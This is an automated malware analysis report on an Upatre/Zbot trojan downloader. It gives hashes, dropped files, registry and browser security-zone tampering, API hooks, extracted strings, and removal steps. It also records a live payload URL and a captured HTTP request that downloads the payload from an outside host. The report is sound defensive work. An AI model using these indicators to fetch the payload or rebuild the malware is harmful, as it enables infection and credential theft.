Gen.Variant.Kazy.337492_cf4a38fd8f
Gen:Variant.Kazy.337492 (BitDefender), TrojanDownloader:Win32/Upatre.L (Microsoft), Trojan.Win32.Bublik.casi (Kaspersky), Trojan.Win32.Upatre.jr (v) (VIPRE), Trojan.DownLoad3.28161 (DrWeb), Gen:Variant.Kazy.337492 (B) (Emsisoft), Downloader-FSH!CF4A38FD8F57 (McAfee), Trojan.Zbot (Symantec), Gen:Variant.Kazy.337492 (FSecure), Generic35.BVIS (AVG), Win32:Malware-gen (Avast), TROJ_UPATRE.SMBX (TrendMicro), Gen:Variant.Kazy.337492 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: cf4a38fd8f57e5ba1e9ce16d4c35d6df
SHA1: 6539aeeb0850569248e441ef73500cf9c3b936fe
SHA256: 922915bd187adb013b53cc24cad85a5b7ba5a0f62a6d2b9c159eca05db2de0a1
SSDeep: 384:KP be5GzzM5jHXRrs905INeZCFtejlIko5dN127BFVn2p4lAnZ8OxsBCtFWg:E 60zsjHXRrs9sINeZEtejlIkoLN127w
Size: 18544 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-04-08 06:45:01
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
lipoty.exe:1200
update_pdf.exe:1848
%original file name%.exe:608
acwuq.exe:448
The Trojan injects its code into the following process(es):
Explorer.EXE:1604
File activity
The process lipoty.exe:1200 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Umveqe\acwuq.exe (2447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KUI106D.bat (175 bytes)
The process update_pdf.exe:1848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\lipoty.exe (1623 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O1Q3GHUJ\14USp[1].pdd (295 bytes)
The process %original file name%.exe:608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\update_pdf.exe (18 bytes)
The process acwuq.exe:448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (7720 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (7172 bytes)
Registry activity
The process lipoty.exe:1200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 92 01 8E AC 2B 56 D3 27 D0 9B 92 3A 48 AF FA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process update_pdf.exe:1848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"lipoty.exe" = "lipoty"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D F4 44 91 B9 C9 62 0A 7C 2B F5 A4 1F 03 AA 94"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 85 96 56 F6 B2 C8 A0 BF 00 C0 8E FA 72 EC 56"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"update_pdf.exe" = "update_pdf"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that do not belong to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process acwuq.exe:448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D E6 87 EE F8 29 38 66 3A 2E A1 9F F6 28 90 44"
[HKCU\Software\Microsoft\Yhyxovf]
"14621f9b" = "8A 0D B8 20 71 85 78 48 8F F2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
Dropped PE files
| MD5 | File path |
|---|---|
| dcc1f7ebcd0355623d0baa2388bfa15d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Umveqe\acwuq.exe |
| 0286c900d6344c78d1dd5349ea08d18b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\update_pdf.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan installs the following user-mode hooks in Secur32.dll:
DecryptMessage
SealMessage
DeleteSecurityContext
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 3166 | 3584 | 4.96115 | 9c9b9dcb2cd71c358d6464bfa00058bd |
| .rdata | 8192 | 946 | 1024 | 2.99195 | 362851758a0ddb64e690b73c5d51f056 |
| .data | 12288 | 1280 | 1536 | 3.50283 | 513a26dde7d20e49eb60204d596b1b70 |
| .rsrc | 16384 | 10800 | 11264 | 3.80346 | d830c37dd0fe902b8ebae3264e3674c2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://nevcoengineers.com/img/scenes/14USp.pdd | |
| www.nevcoengineers.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Downloader (P2P Zeus dropper UA)
ET TROJAN Upatre Binary Download Jan 02 2014
Traffic
GET /img/scenes/14USp.pdd HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: VVV.nevcoengineers.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 18 Mar 2014 16:56:25 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.4.26
Last-Modified: Fri, 14 Feb 2014 15:23:31 GMT
ETag: "4f68-4806f-4f25f637d7d6f"
Accept-Ranges: bytes
Content-Length: 295023
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
.text
`.data
.idata
@.reloc
Invalid parameter passed to C runtime function.
0123456789
http://www.google.com/
http://www.bing.com/
REPORT
HTTP/1.1
RegDeleteKeyExW
gdiplus.dll
GdiplusShutdown
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
ntdll.dll
KERNEL32.dll
ExitWindowsEx
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
RegCreateKeyExW
RegCloseKey
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegFlushKey
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
ole32.dll
GDI32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
msvcrt.dll
\StringFileInfo\xx\%s
urlmon.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
kernel32.dll
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
shell32.dll
cabinet.dll
Wadvapi32.dll
"%s" %s
/c "%s"
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{3D6E1BE3-083C-4088-F013-F140DE00D252}
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
lipoty.exe:1200
update_pdf.exe:1848
%original file name%.exe:608
acwuq.exe:448
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\Umveqe\acwuq.exe (2447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KUI106D.bat (175 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lipoty.exe (1623 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O1Q3GHUJ\14USp[1].pdd (295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\update_pdf.exe (18 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (7720 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.